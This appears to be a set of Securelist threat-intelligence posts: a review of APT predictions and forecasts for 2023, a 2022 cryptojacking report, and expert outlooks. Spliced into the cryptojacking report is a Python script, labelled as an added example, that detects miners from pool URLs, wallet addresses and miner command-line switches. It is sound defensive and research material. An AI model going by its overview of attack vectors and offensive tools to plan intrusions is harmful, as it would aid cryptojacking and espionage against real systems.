Increase in APT intrusions in the META region, especially Africa

At the end of last year, we expected the rise of Africa to be one of the major geopolitical events of the year in light of the ever-increasing investment and relationships with China and the Middle East.

We have indeed seen an increase in the number of persistent, sophisticated attacks targeting various states in META and specifically Africa. Starting from the most recent publication about Metador targeting telecommunication companies, HotCousin expanding its operations to this region, the numerous campaigns deploying various IIS backdoors, DeathStalker and Lazarus attacking multiple industries there and a mysterious SSP-library backdoor discovered on governmental and non-profit entities, we saw quite a few new threats active in the region over the last year.

Statistically speaking, we released information about an increase of backdoor infections on the continent. While such raw statistics are difficult to interpret and are not necessarily linked to strong APT activity, it could correlate to the increase in APT attacks we’ve seen in the region in 2022.

One glaring example is Iran, which faced a series of spectacular hacks and sabotages. Its atomic energy agency, live television and steel industry have been targeted, among others.

Verdict: prediction fulfilled ✅

Explosion of attacks against cloud security and outsourced services

One of the major cyber-incidents of 2022 took place early this year: the Okta hack. Okta was breached through one of its service providers, Sitel, itself compromised via the insecure VPN gateway of a recently acquired company. Fortunately for them, the hacker appears to have been a lone 16-year-old. Unfortunately for us, it demonstrates how easy it must be for sophisticated attackers to penetrate (and, in all likelihood, remain undetected) major platforms. Okta is a widely used authentication services provider, and it is safe to assume that a hacker controlling their network would be able to infect any of their customers.

In related news, CISA released an advisory in May warning managed service providers that they saw an increase of malicious activity targeting their sector. Beyond this, we also saw reports of important data leaks related to misconfigured AWS S3 buckets, although those are nothing new. Overall, we count this prediction as having turned out to be accurate.

Verdict: prediction fulfilled ✅

The return of low-level attacks: bootkits are ‘hot’ again

In line with our predictions, we released two blog posts in 2022 introducing sophisticated low-level bootkits. The first one, in January, was MoonBounce; the other was CosmicStrand in July 2022. In both cases, we described new UEFI firmware bootkits that managed to propagate malicious components from the deepest layers of the machine up to Windows’ user-land. Amn Pardaz also released a report about a malicious program called iLOBleed, which affects a management module present on HP servers and should be counted in the same category. Such highly sophisticated implants remain rare, and witnessing three separate cases in a single year is significant.

Worthy of mention is Binarly’s excellent work on firmware vulnerability research with 22 high-severity vulnerabilities discovered in low-level components for 2022, indicating an enormous attack surface remains. As Gartner once put it: “There are two types of companies – those who have experienced a firmware attack, and those who have experienced a firmware attack but don’t know it.”

Verdict: prediction fulfilled ✅

States clarify their acceptable cyber-offense practices

The rise of hacker indictments as part of states’ retorsion measures led us to believe that each of them would be forced to clarify their vision of what acceptable behavior in cyberspace is. Indeed, since most states admit to having their own cyber-offense program, there is a need to clarify why their own activities are tolerable while those of their adversaries deserve legal action. We therefore expected various parties to release a sort of taxonomy indicating which types of ends would justify the means.

Shortly after the release of our predictions (yet still in 2021), the UK released its Integrated Review of Security, Defence, Development and Foreign Policy in which it describes its vision of what a “responsible democratic cyber power” should be. No other country followed suit. With many key “cyber powers” engaged one way or another in the Ukrainian conflict, cyber-diplomacy has unfortunately taken a back seat and we are seeing less transparency (as well as fewer calls for transparency) in the cyber realm. In the end, our assessment that the world was moving towards a clarification of cyber-policies didn’t come to pass.

Verdict: very limited fulfillment of the prediction ❌

APT predictions for 2023

And now, we turn our attention to the future. Here are the developments we think we could be seeing in 2023.

The rise of destructive attacks

2022 bore witness to brutal geopolitical shifts that will echo for years to come. History shows that such tensions always translate to increased cyber-activities – sometimes for the purpose of intelligence gathering, sometimes as a means of diplomatic signaling. With the antagonism between the West and the East having reached the maximum possible level short of open conflict, we unfortunately expect 2023 will feature cyberattacks of unprecedented gravity.

Specifically, we foresee that a record number of disruptive and destructive cyberattacks will be observed next year, affecting both the government sector and key industries. One caveat is that in all likelihood, a proportion of them will not be easily traceable to cyber-incidents and will look like random accidents. The rest will take the form of pseudo-ransomware attacks or hacktivist operations in order to provide plausible deniability for their real authors.

In addition, we also fear that a limited number of high-profile cyberattacks against civilian infrastructure (energy grid or public broadcasting for instance) will take place. A last point of concern is the safety of underwater cables and fiber distribution hubs in such a context, as they are particularly difficult to protect from physical destruction.

Mail servers become priority targets

In the past years, we have seen vulnerability researchers increasingly focus on emailing software. The reason is simple: they represent huge software stacks that must support many protocols and have to be internet-facing to operate properly. The market leaders, Microsoft Exchange and Zimbra, have both faced critical vulnerabilities (pre-authentication RCEs) that were exploited, sometimes massively, by attackers before a patch was available.

We believe that research into mail software vulnerabilities is only getting started. Mail servers have the double misfortune of harboring key intelligence of interest to APT actors and having the biggest attack surface imaginable. 2023 will very likely be a year of 0-days for all major email software. We encourage system administrators to immediately set up monitoring for these machines, due to the unlikelihood that patching (even in a timely fashion) will be sufficient to protect them.

The next WannaCry

Statistically, some of the largest and the most impactful cyber epidemics occur every 6-7 years. The last incident of the sort was the infamous WannaCry ransomware-worm, leveraging the extremely potent EternalBlue vulnerability to automatically spread to vulnerable machines.

Fortunately, vulnerabilities that enable the creation of worms are few and far between, and need to meet a number of conditions to be suitable (reliability of the exploit, stability of the target machine, etc.). It is extremely difficult to predict when such a bug will be discovered next, but we will take a wild guess and mark it up for next year. One potential reason increasing the likelihood of such an event is the fact that the most sophisticated actors in the world likely possess at least one suitable exploit of the sort, and current tensions greatly increase the chance that a ShadowBrokers-style hack-and-leak (see below) could take place.

APT targeting turns toward satellite technologies, producers and operators

It is nearly 40 years since the US’s Strategic Defense Initiative (nicknamed “Star Wars”) contemplated extending military capabilities to include space technologies. While such things may have seemed a little far-fetched in 1983, there have been several instances where countries have successfully interfered with satellites orbiting the earth.

Both China and Russia have used ground-based missiles to destroy their own satellites. There have also been claims that China has launched a satellite with a grappling arm that could be used to interfere with orbiting equipment and that Russia may have developed the same technology. We have already seen the hijacking of satellite communications by an APT threat actor.

If the Viasat incident is any indication, it is likely that APT threat actors will increasingly turn their attention to the manipulation of, and interference with, satellite technologies in the future, making the security of such technologies ever more important.

Hack-and-leak is the new black (and bleak)

There is still much debate regarding whether “cyberwar” indeed took place in the context of the Ukrainian crisis. It is however clear that a new form of hybrid conflict is currently unfolding, involving (among many things) hack-and-leak operations.

This modus operandi involves breaching a target and releasing internal documents and emails publicly. Ransomware groups have resorted to this tactic as a way to apply pressure on victims, but APTs may leverage it for purely disruptive ends. In the past, we’ve seen APT actors leak data about competing threat groups, or create websites disseminating personal information. While it is difficult to assess their effectiveness from the sidelines, there’s no doubt they’re part of the landscape now and that 2023 will involve a high number of cases.

More APT groups will move from CobaltStrike to other alternatives

CobaltStrike, released in 2012, is a threat emulation tool designed to help red teams understand the methods an attacker can use to penetrate a network. Unfortunately, along with the Metasploit Framework, it has since become a tool of choice for cybercriminal groups and APT threat actors alike. However, we believe that a number of threat actors will begin to use other alternatives.

One of these alternatives is Brute Ratel C4, a commercial attack simulation tool that is especially dangerous since it has been designed to avoid detection by antivirus and EDR protection. Another is the open-source offensive tool Sliver.

In addition to off-the-shelf products abused by threat actors, there are other tools that are likely to be included in APT toolsets. One of these, Manjusaka, is advertised as an imitation of the Cobalt Strike framework. The implants of this tool are written in the Rust language for Windows and Linux. A fully functional version of the C&C written in Golang is freely available and can easily generate new implants with custom configurations. Another is Ninja, a tool that provides a large set of commands, which allows attackers to control remote systems, avoid detection and penetrate deep inside a target network.

Overall, we suspect that CobaltStrike is receiving too much attention from defenders (especially when it comes to the infrastructure), and that APTs will make attempts to diversify their toolsets in order to remain undetected.

SIGINT-delivered malware

It has been almost 10 years since the Snowden revelations shed light on the FoxAcid/Quantum hacking system used by the NSA. It involved leveraging “partnerships with US telecoms companies” to place servers in key positions of the internet backbone, allowing the agency to perform man-on-the-side attacks. This is one of the most potent attack vectors imaginable, as it allows victims to be infected without any interaction on their part. In 2022, we saw another threat actor replicate this technique in China, and there is little doubt in our minds that many groups have worked tirelessly to acquire this capability. While deploying it at scale requires political and technological power available to few, it is likely that by now Quantum-like tools have been implemented at the local level (i.e., at country level, by relying on national ISPs).

Such attacks are extremely hard to spot, but we predict that their becoming more widespread will lead to more discoveries in 2023.

Drone hacking!

Despite the flashy title, we’re not talking about hacks of unmanned aircrafts used for surveillance or even military support (although that could happen too). This final prediction concerns itself with the other way around: the use of commercial-grade drones to enable proximity hacking.

Year after year, drones available to the general public gain additional range and capabilities. It wouldn’t take too much work to mount one of them with a rogue Wi-Fi access point or an IMSI catcher; or sufficient tooling that would allow the collection of WPA handshakes used for offline cracking of Wi-Fi passwords. Another attack scenario would be using drones to drop malicious USB keys in restricted areas, in the hope that a passer-by would pick them up and plug them into a machine. All in all, we believe this to be a promising attack vector, likely to be used by bold attackers or specialists already adept at mixing physical- and cyber-intrusion.

See you next year to see how we fared!

The state of cryptojacking in the first three quarters of 2022

10 November, 2022 - 09:00

Cryptocurrency prices were dropping from the end of 2021 and throughout the first half of 2022. Although finance experts and retail investors estimate crypto to have a solid chance of recovery in the long term, at the time of writing this report the prices remain low. However, cybercriminals are capitalizing on this vulnerable industry more than ever. From advanced APT campaigns targeting crypto organizations (BlueNoroff, NaiveCopy, etc.) to various types of hastily made crypto scams, we observe threat actors diversifying their malicious activity against crypto investors — and not only them.

In fact, cybercriminals hunting for crypto can target anyone. Apart from cryptocurrency theft, they extort digital money or illicitly mine it using victims’ devices instead of their own. Cryptocurrency mining is a painstaking and costly process, and not as rewarding as when the prices were high. However, it still attracts even legitimate miners. This can be explained, on the one hand, by the falling cost of mining equipment and, on the other, by less efficient market players having left the game, allowing those who remain to increase their market share. Cybercriminals pay neither for equipment nor for electricity, which is rather expensive in 2022. They install mining software on the target computer to use its processing power without the victim’s consent. Moreover, malicious mining, or cryptojacking, does not require much specialized technical expertise. In fact, all the attacker needs to know is how to build a miner from open-source code, or where to buy one. If the cryptomining malware is installed successfully on the victim’s computer, it delivers stable earnings to its operator. In this report we analyze cryptojacking activity in the first three quarters of 2022, and provide some relevant statistics and insights.

Methodology

This research aims to define the state of cryptojacking in the current threat landscape. The data in this report has been taken from aggregated threat statistics obtained from a variety of sources that include our internal sources, open sources, etc. The main tool we use to obtain and analyze threat-related data is Kaspersky Security Network (KSN). KSN is dedicated to processing cybersecurity-related depersonalized data streams from Kaspersky products whose users consented to anonymized data collection. The metrics provided in this report are based on the number of distinct users of Kaspersky products with KSN enabled who encountered cryptominers at least once in a given period, as well as research into the threat landscape by Kaspersky experts. All analyzed data is anonymized.

In this report, we examine the main motivation factors for cybercriminals resorting to malicious mining, as well as the most widespread ways of propagation into the victim’s computer. The threat landscape of hidden mining malware is analyzed through a close examination of new malware modifications, the number of affected users, and their geographical distribution. Additionally, we look into certain cryptojackers’ wallets to get some insight into the amount of money they receive.

The statistics in this report are provided for the first three quarters of 2022. The data from 2022 is compared to data from 2021 to assess year-on-year development trends in cryptojacking.

Key findings:
  • Malicious mining programs are widely distributed through unpatched vulnerabilities in operating systems. In Q3 2022, nearly one in six cases of exploiting well-known vulnerabilities was accompanied by a miner infection.
  • In Q3 2022, the number of new variants of miners saw more than triple growth when compared to Q3 2021, and exceeded 150,000.
  • Q1 2022 saw the biggest number of users (over 500,000) affected by malicious mining software, and the smallest number of new malicious miner variants.
  • The country with the highest number of attacked users was Ethiopia, where cryptocurrencies are officially banned.
  • Monero (XMR) is the most popular cryptocurrency for malicious mining.

To mine or not to mine?

Cryptojacking is becoming more prominent in the global threat landscape. This year we saw various types of attackers switching their attention to crypto mining. For example, AstraLocker, a major ransomware operator, shut down this activity to pursue cryptojacking. One of the main reasons for that shift may lie in the fact that malicious mining is one of the easiest ways to earn passive income. While ransomware operators pursue bigger money, not every attack results in the ransom being paid. Miners, on the contrary, just infect the machine and earn a stable profit for their operators. Moreover, unlike ransomware, which announces its presence as soon as the victim files are encrypted, mining malware can remain in the target system unnoticed for months or even longer.

Ways of propagation

There are many ways to distribute miners, and most of them are similar to the methods of distribution of any other type of malware.

One of the most popular miner distribution methods is through malicious files masquerading as pirated content. Cybercriminals actively lure their victims with trendy films, music, games, and software to spread malicious mining programs. They can distribute them through specially crafted landing pages, as well as via torrent links.

While the method described above affects mostly consumer devices, there are a number of distribution methods for delivering miners to more powerful equipment used by businesses. They include hacking the victim’s server using leaked or brute-forced credentials, worm-like spreading through flash drives or network storage, and distributing miners through unpatched vulnerabilities in the OS and other software.

Not always malware

Interestingly, cybercriminals use not only malware to mine digital currency without users’ consent. They try to avoid detection and save resources on malware development using legitimate mining programs with open-source code. By themselves, these tools do not contain malicious functionality, but they can be loaded by mining malware and used for cryptojacking.

Example of legitimate programs used by cryptojackers to covertly mine Ethereum (ETH), Ravencoin (RVN), Ethereum Classic (ETC), and Ergo (ERG), according to our statistics

Cryptojacking in numbers

Vulnerability exploitation and miners

Unpatched vulnerabilities pose a serious challenge to users, while being an appealing lure for cybercriminals who exploit them to spread malicious activity. Our telemetry shows that miners are one of the most widespread types of threats when it comes to attacks via vulnerable software. Moreover, 2022 saw an increase in the share of hidden mining software distributed through well-known vulnerabilities. This year, nearly one in seven attacks exploiting such vulnerabilities was accompanied by a miner infection. In Q3, miners, which accounted for one sixth of all vulnerability exploitation attacks, became even more widespread than backdoors, the prime choice of cybercriminals throughout the first half of 2022.

TOP 4 malware types that attackers tried to launch as a result of exploiting vulnerabilities, Q1–Q3 2022

Let’s look at some specific services whose vulnerabilities are often used in cyberattacks. In Q1 2022, 14% of SQLAgent vulnerability exploitation cases resulted in miner infection, and in Q3 2022 this number grew slightly to 16% of all SQLAgent attacks.

TOP 4 malicious and unwanted file types installed via SQLAgent vulnerabilities, Q1–Q3 2022

The share of mining software loaded as a result of exploitation of LSASS-related vulnerabilities grew as well, from 17% in Q1 2022 to 19% in Q3.

TOP 4 malicious and unwanted file types installed as a result of exploitation of LSASS-related vulnerabilities, Q1–Q3 2022

New modifications and affected users

The overall number of new modifications of malicious mining software also increased dramatically in 2022. From January to the end of October 2022, Kaspersky solutions detected 215,843 new modifications of miners. This is more than twice the rate for the same period in 2021, when the number of modifications edged slightly over 100,000.

Notably, the number of new variants of such programs skyrocketed in Q3 2022. Compared to Q3 2021, that was more than threefold growth. Thus, in Q3 2022, the number of new malicious miners exceeded 150,000. This may be explained by the fact that after hitting their lowest rates in late June and the beginning of July, cryptocurrencies grew slightly at the end of the month. Cybercriminals may have increased their activity in anticipation of further growth that did not happen.

Number of new miner modifications, Q1–Q3, 2021 and 2022

Interestingly, during the period of analysis, the biggest number of affected users was registered not in Q3, which experienced a surge in new miner modifications, but in Q1, when the number of new modifications was the lowest.

Number of users affected by miners, Q1–Q3, 2021 and 2022

Attack geography

Interestingly, the most targeted country in Q3 2022 was Ethiopia (2.38%), where it is illegal to use and mine cryptocurrencies. Kazakhstan (2.13%) and Uzbekistan (2.01%) follow in second and third place.

TOP 10 most targeted countries by share of users encountering miners, Q3 2022:

Rank  Country*     % of users attacked by miners**
1     Ethiopia     2.38%
2     Kazakhstan   2.13%
3     Uzbekistan   2.01%
4     Rwanda       1.93%
5     Tajikistan   1.83%
6     Venezuela    1.78%
7     Kyrgyzstan   1.73%
8     Mozambique   1.57%
9     Tanzania     1.56%
10    Ukraine      1.54%

* Excluded are countries where the number of Kaspersky users is relatively small (less than 50,000)
** Percentage of unique users whose devices were attacked by miners, from all unique users of Kaspersky products in the country.

Fourth place goes to Rwanda (1.93%), and fifth to Tajikistan (1.83%). The sixth most attacked country is Venezuela (1.78%), which is known to be among the first nations in the world to introduce a national cryptocurrency, Petro.

Let’s talk money

We took a closer look into the mining attacks to get some understanding of which coins are more popular among cybercriminals, and how much money they make mining these coins. For this we analyzed mining malware samples that were detected by our products in September 2022, extracted cryptocurrency wallet addresses from them, and monitored transactions to these wallets from January 1, 2022, through September 30, 2022. Note that there are other miner samples, as well as other wallets out there that are not represented in these statistics. Note also that we cannot distinguish mining transactions to the monitored wallets from other types of transactions.
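The wallet analysis described above starts from a mundane step: pulling pool endpoints and wallet addresses out of a sample's strings, the same strings that betray a legitimate open-source miner bundled by malware (see "Not always malware"). Below is an added example of that step in Python; it is not Securelist's tooling, the sample strings are constructed, the pool host `pool.example.invalid` is a placeholder, the Monero-shaped address is synthetic, and the only real address is the well-known Bitcoin genesis-block address, used as a "known valid" fixture. Bitcoin candidates are checked with Base58Check so that look-alike junk is not counted as a wallet; Monero candidates get a format check only.

```python
"""Pull cryptomining indicators out of strings recovered from a sample.

Added example, not Securelist's own tooling.  Input is a list of strings as
strings(1) or a process command line would yield them.  Sample data below is
constructed; the genesis-block address is the only real one and serves purely
as a "known valid" fixture.
"""
import hashlib
import re
from dataclasses import dataclass, field
from typing import Iterable

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# Legacy Bitcoin (P2PKH/P2SH) addresses: 26-35 Base58 chars starting with 1 or 3.
BTC_RE = re.compile(r"\b[13][1-9A-HJ-NP-Za-km-z]{25,34}\b")
# Monero standard addresses: 95 Base58 chars starting with 4.  Format check only;
# Monero's checksum (Keccak-based) is not verified here.
XMR_RE = re.compile(r"\b4[1-9A-HJ-NP-Za-km-z]{94}\b")
# Stratum pool URLs, the protocol most miners use to talk to a pool.
POOL_RE = re.compile(r"stratum\+(?:tcp|ssl)://[\w.-]+:\d+")
# Switches common to popular open-source miners (assumed starting list, extend as needed).
MINER_FLAGS = ("--donate-level", "--coin", "--algo", "-o stratum")


def b58decode(s: str) -> bytes:
    """Decode Base58; each leading '1' character encodes one leading zero byte."""
    n = 0
    for ch in s:
        n = n * 58 + B58_ALPHABET.index(ch)  # ValueError on a non-Base58 character
    pad = len(s) - len(s.lstrip("1"))
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    return b"\x00" * pad + body


def is_valid_btc_address(addr: str) -> bool:
    """Base58Check: 21-byte payload followed by the first 4 bytes of SHA256(SHA256(payload))."""
    try:
        raw = b58decode(addr)
    except ValueError:
        return False
    if len(raw) != 25:
        return False
    payload, checksum = raw[:21], raw[21:]
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum


@dataclass
class MiningIndicators:
    pool_urls: list[str] = field(default_factory=list)
    btc_addresses: list[str] = field(default_factory=list)   # passed Base58Check
    rejected: list[str] = field(default_factory=list)        # BTC-shaped, failed the check
    xmr_candidates: list[str] = field(default_factory=list)  # format match only
    miner_flags: list[str] = field(default_factory=list)


def _add(bucket: list[str], item: str) -> None:
    if item not in bucket:
        bucket.append(item)


def extract_indicators(strings: Iterable[str]) -> MiningIndicators:
    """Scan every string once and sort what it finds into the buckets above."""
    found = MiningIndicators()
    for s in strings:
        for url in POOL_RE.findall(s):
            _add(found.pool_urls, url)
        for addr in BTC_RE.findall(s):
            _add(found.btc_addresses if is_valid_btc_address(addr) else found.rejected, addr)
        for addr in XMR_RE.findall(s):
            _add(found.xmr_candidates, addr)
        for flag in MINER_FLAGS:
            if flag in s:
                _add(found.miner_flags, flag)
    return found


def is_likely_miner(found: MiningIndicators) -> bool:
    """A pool URL is decisive; otherwise require a wallet plus a miner switch."""
    has_wallet = bool(found.btc_addresses or found.xmr_candidates)
    return bool(found.pool_urls) or (has_wallet and bool(found.miner_flags))


# Constructed sample input.
GENESIS_BTC = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"  # real, well-known, valid fixture
BAD_BTC = GENESIS_BTC[:-1] + "b"                    # one character off: checksum must fail
FAKE_XMR = "4" + "AB" * 47                          # synthetic: right shape, not a wallet

SAMPLE_STRINGS = [
    r"C:\ProgramData\svchost.exe",
    f"-o stratum+tcp://pool.example.invalid:3333 -u {FAKE_XMR} -p x --donate-level=1",
    "stratum+ssl://pool.example.invalid:443",
    f"Pay to {GENESIS_BTC}",
    f"ref={BAD_BTC}",
    "NOT-AN-ADDRESS-" + "1" * 28,  # Base58 shape, but decodes to the wrong length
]

if __name__ == "__main__":
    result = extract_indicators(SAMPLE_STRINGS)
    print(result)
    print("likely miner:", is_likely_miner(result))
```

Checksum validation matters in practice because a Base58-shaped string is easy to hit by accident in a binary; the `rejected` bucket keeps those near-misses visible for a second look rather than silently dropping them.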

Most of the analyzed samples of malicious mining software (48%) secretly mine Monero (XMR) using the victim’s hardware. This currency is known for the privacy technologies built into it that anonymize transaction data. Observers cannot identify the addresses involved in Monero transactions, the transaction amounts, address balances, or transaction histories, all of which makes it extremely appealing to cybercriminals.

Most popular digital cryptocurrencies mined via cryptojacking

The world’s most popular cryptocurrency, Bitcoin (BTC), was cybercriminals’ second choice with a share of 17%; while Ethereum (ETH), which is most frequently used to exchange NFTs, closes the Top 3 with 14%. Other cryptocurrencies mined by cybercriminals are Litecoin (LTC), Bit Hotel (BTH), Dash (DASH), Dogecoin (DOGE), and Neo (NEO).

Cybercriminal profits vary greatly from wallet to wallet. Bitcoin wallets we monitored on average received 0.08 BTC or around US$1.6K per month. However, one Bitcoin wallet showed significantly greater transaction amounts. In September 2022, for example, it received nearly 1.79 BTC, the equivalent of more than US$34K at the time of research.

Conclusion

Even though the world is facing a crypto winter with digital currencies losing their value, cryptocurrencies remain appealing for cybercriminals. The rise in the number of cryptojacking attacks goes hand in hand with the rising number of new program modifications and diversified ways of propagation. Hidden mining is a profitable activity which requires minimum effort; therefore, cybercriminals will continue to try to gain profit this way. Although hidden mining doesn’t cause direct financial damage to victims, it lowers the performance of infected systems, at the same time as increasing the electricity costs for victims. Therefore, companies and users should remain alert to the current threat trends and get ready for the crypto spring ahead of us.

To ensure no one is using your home equipment for their own profit, follow these tips:

  • Use reliable security solutions that protect your computer and other devices from mining malware.
  • Download software and media from official sources; remember that pirate files can contain a malicious payload.
  • Do not forget to update your operating system and other software.

To keep your corporate devices protected, we recommend:

  • Always keeping software updated on all devices you use so as to prevent attackers from infiltrating your network by exploiting vulnerabilities.
  • Introducing strict cybersecurity policies in your organization to avoid a situation when employees use corporate computing power to mine crypto coins or install malicious software on corporate equipment by accident.
  • Using a dedicated security solution such as Kaspersky Endpoint Security for Business that can quickly detect and eliminate malicious activity, as well as help manage vulnerabilities and patches.

Cybersecurity threats: what awaits us in 2023?

9 November, 2022 - 09:00

Knowing what the future holds can help you prepare better for emerging threats. Every year, Kaspersky experts prepare forecasts for different industries, helping them to build a strong defense against any cybersecurity threats they might face in the foreseeable future. Those predictions form the Kaspersky Security Bulletin (KSB), an annual project led by Kaspersky experts.

As for KSB 2022, we invited notable experts to share their insights and unbiased opinions on what we should expect from cybersecurity in the following year. The contributors include representatives from government institutions: H.E. Dr. Mohamed Al Kuwaiti (UAE Cyber Security Council), and public organizations: Kubo Mačák, Tilman Rodenhäuser, Mauro Vignati (ICRC), Serge Droz (FIRST), Sven Herpig (the think tank Stiftung Neue Verantwortung). Also, we’d like to thank Prof. Dr. Dennis-Kenji Kipker (the University of Bremen; European Academy for Freedom of Information and Data Protection (EAID)), Arthur Laudrain (The Hague Centre for Strategic Studies), Stefan Soesanto (The Center for Security Studies (CSS) at ETH Zurich) for their scientific and profound contribution. Moreover, we included predictions made by our fellow commercial organizations – James Range (White Rock Security Group) and Irena Yordanova (Polycomp Ltd.).

The opinions shared by the contributing experts demonstrate the complexity of the modern cybersecurity industry and a strong need for collaboration among different organizations in order to combat the cyberthreats that companies, individuals or even whole countries are exposed to.

What cyberthreats for business will be the greatest in 2023?

Vladimir Dashchenko, Security Evangelist, Kaspersky

The ongoing geopolitical storm brings not only classical cyberthreats for business, but also unpredictable risks and ‘black swans’. The main problem for 2023 will be supply-chain stability and cybersecurity. While supply-chain is a big challenge for business right now, its cybersecurity is not merely an issue, it’s a major problem. Supply-chain will become more of a sweet spot for targeted ransomware and state-sponsored espionage campaigns.

Another big issue is global semiconductor shortage. This will definitely play its role in corporate cybersecurity. While many companies need increasingly more computing power, (servers, workstations, network hardware and so on…) the price on the equipment continues to rise. There’s a possibility that, to cover hardware needs, some of the businesses will have to cut planned cybersecurity expenses.

Yury Slobodyanuk, head of content filtering research, Kaspersky

I think we will continue seeing attacks targeting the infrastructure of different countries and organizations. Phishing attacks are going to become even more sophisticated, since a lot of basic tactics have already been tried this year, and businesses learned to repel those.

Ivan Kwiatkowski, senior security researcher, Global Research and Analysis Team, Kaspersky

Businesses will still be mostly concerned with ransomware. The conflict between Russia and Ukraine has marked an end to any possible law enforcement cooperation in the foreseeable future. We can therefore expect that cybercrime groups from either block will feel safe to attack companies from the opposing side. Some may even perceive this as their patriotic duty. The economic downturn (caused by energy prices, inflation, sanctions, etc.) will lead more people to poverty, which always translates to increased criminality (cyber or otherwise), and we know ransomware to be extremely profitable.

James Range, President of White Rock Security Group

Zero trust will take on greater prominence with the continued role of the remote and hybrid workplace. Remote work will continue driving the need for zero trust since hybrid work is now the new normal. With the federal government mandating agencies to adopt zero-trust network policies and design, we expect this to become more common and the private sector to follow suit as 2023 becomes the year of verifying everything.

Arthur Laudrain, Strategic Analyst (Cyber Program), The Hague Centre for Strategic Studies

In 2023, we might see a slight decline in the raw number of ransomware attacks, reflecting the slowdown of the cryptocurrency markets. However, ransomware operators will keep professionalizing their operations and will target higher value organizations. At the same time, state-sponsored attacks will remain high in the threat landscape, with no ease of geopolitical tensions with Russia, China, North Korea, and Iran in sight. Businesses most at risk are aerospace and defense contractors, as well as critical infrastructure operators (utilities such as water, electricity, and Internet, but also hospitals and operators of large cyber-physical systems such as dams).

Stefan Soesanto, Senior Cyber Defense Researcher, The Center for Security Studies (CSS) at ETH Zürich

If I had a magic 8-ball, I would predict that the greatest cyberthreats to businesses in 2023 will be a significant increase in foreign intelligence services conducting operations under the cover of hacktivist groups, fighting big oil, climate change, fiscal policies etc. And that (b) we are also likely to see a steep increase in DDoS extortion campaigns as the Cyberwar in Ukraine leads to all-time-high levels of DDoS attacks.

Irena Yordanova, Product Manager Software, Polycomp Ltd.

We expect cyberthreats to rise in 2023, as unrest in the world contributes to an increase in cybercrimes. Malware attacks like ransomware will happen to businesses more frequently. And IT teams should be prepared to deal with evolving threats posed by emerging technologies which are becoming widespread, such as geo-targeted phishing or attacks related to Cloud Security, IOT and AI. Most probably more attacks on the education and healthcare sectors will occur plus targeted campaigns against industry leaders – especially those that hold critical information: sensitive data, top expertise, and latest technologies. Given that, employees should be educated and equipped to fight these mature attacks; and their companies can contribute by having experienced outside security partners to support them on this issue. End-users can prepare themselves with an easy-to-use security solution for upcoming challenges, whether it’s phishing attacks or threats related to multiple layers of security.

What cybersecurity challenges will industries face next year?

Vladimir Dashchenko, Security Evangelist, Kaspersky

Threat modeling approaches will be changed in 2023. Internet ‘balkanization’, ongoing military conflicts, changes, and tensions in existing political groups of countries are influencing cyberspace and cybercrime. We will see an increasing number of cybercriminals taking political sides and breaking the law with political statements. Also, script-kiddies (low skilled hackers) will be joining groups of cybercriminals led by more skilled perpetrators, or state sponsored hackers more often.

The major challenge for cybersecurity itself will be a lack of transparency and information sharing between companies. It will be extremely difficult to follow the ‘business as usual’ concept and remain neutral. Global political conglomerates will unfortunately influence cyberspace and cybersecurity.

Arthur Laudrain, Strategic Analyst (Cyber Program), The Hague Centre for Strategic Studies

Next year should see a continuation of existing trends. In particular, governments, critical infrastructure operators, and businesses with a large international footprint will face the continued challenge of ensuring the safety and integrity of their supply-chains, both in terms of software and hardware. Often, this will require closer integration with their contractors and suppliers, none the least to comply with new regulatory obligations in the U.S. and the E.U.

James Range, President of White Rock Security Group

Given the continued surge of ransomware attacks, which soared 288% in the first half of 2022 alone, the need for cyber insurance will be a bigger priority, especially in the SMB market. Although many industry experts argue against payouts, making cyber coverage a controversial topic, the evolving threat landscape means cyber insurance should be a top consideration as part of organizations’ cyber strategy. As such, we anticipate a booming cyber insurance industry as many organizations heed these warnings and seek to guard against ransomware attacks. Yet, in addition to cyber insurance, companies will need a designated DR or RR (Rolling Recovery) plan.

Kubo Mačák, Legal Adviser, Tilman Rodenhäuser, Legal Adviser, Mauro Vignati, Adviser on Digital Technologies of Warfare, ICRC

A key concern for 2023 is that civilians will be further impacted by cyber operations during armed conflict. Civilian data, devices, and networks – such as government services, critical infrastructure, or companies – risk being deliberately disrupted or damaged, often in violation of the laws of war. Civilians – individuals and companies – may get drawn into digital warfare activities, encouraged to engage in cyber operations or to support kinetic military operations through digital means. Such developments put people and societies in danger and undermine the cardinal rule that belligerents must at all times distinguish between what is military and what is civilian.

Stefan Soesanto, Senior Cyber Defense Researcher, Center for Security Studies (CSS)

I expect that the theft of medical data (e.g. Finland’s Vastaamo in 2020 & Australia’s Medibank in 2022), as well as highly private personal data (e.g. Ashley Madison in 2015), will become the major focus of ransomware groups and other cybercriminal actors alike. Underpinning this trend, the lesson learned is that imposing massive psychological pressure directly on thousands of separate victims increases the likelihood of individual extortion payouts being made.

What cyberthreats will pose the most danger to end-users?

Yury Slobodyanuk, head of content filtering research, Kaspersky

As the geopolitical situation is quite tense, different types of fraud will take advantage of new events that will take place. Also, various techniques of generating fake news using AI may be used.

Sven Herpig, Director Cybersecurity at think tank Stiftung Neue Verantwortung

I believe cybercrime is the biggest threat to end-users, but mainly in an indirect fashion. Cybercrime is looming over providers of essential services and goods such as municipalities, hospitals and even producers of baby food offline, rendering them less or non-operational for several days or weeks. This has a direct impact on citizens’ lives in the real world and is therefore something that I would see as one of the most prevailing threats to individuals.

Prof. Dr. Dennis-Kenji Kipker, Professor for IT Security Law at the University of Bremen; Visiting Professor at Riga Graduate School of Law; Member of the Board of the European Academy for Freedom of Information and Data Protection (EAID)

Remote workers in home offices continue to play a major role in everyday working life, along with the increased use of BYOD, which takes control of devices away from administrators. Since 2020, therefore, forms of spear phishing, social engineering and CEO fraud, as well as ransomware, have become increasingly prevalent and will continue to be of considerable importance in 2023. The professionalization of cybercrime, now an independent “industry”, is contributing to a further tightening of the security situation for end users, as low-cost mass attacks are made possible in this way.

H.E. Dr. Mohamed Al Kuwaiti, UAE Cyber Security Council

IoT Vulnerabilities. Security issues keep plaguing IoT devices dominating the market today. As IoT combines the physical world and virtual space, home intrusions are being added to the list of the scariest possible threats that IoT brings.

Vulnerabilities in Autonomous Vehicles. Due to the inherent risks of Autonomous Vehicles, they are increasingly vulnerable to attacks resulting in data breaches, supply chain disruptions, property damage, financial loss, and injury or loss of life.

